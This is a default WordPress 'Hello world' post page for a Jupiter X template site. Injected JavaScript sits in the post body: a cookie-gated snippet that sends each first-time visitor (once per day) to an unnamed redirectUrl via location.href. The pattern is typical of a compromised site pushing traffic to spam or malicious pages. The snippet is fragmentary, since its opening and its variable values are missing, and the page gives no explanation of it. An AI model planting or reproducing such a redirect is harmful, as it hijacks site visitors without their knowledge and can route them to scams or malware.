Welcome to Just another Jupiter X Template. This is your first post. Edit or delete it, then start blogging!

function getCookie(name) { const value = "; " + document.cookie; const parts = value.split("; " + name + "="); if (parts.length === 2) return parts.pop().split(";").shift(); return null; }

function setCookie(name, value, days) { const expires = new Date(Date.now() + days*24*60*60*1000).toUTCString(); document.cookie = name + "=" + value + "; expires=" + expires + "; path=/"; }

if (!getCookie(cookieName)) { setCookie(cookieName, "true", 1); location.href = redirectUrl; } })();

1 Comment

  1. Hi, this is a comment.
    To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
    Commenter avatars come from Gravatar.


Comments are closed for this article!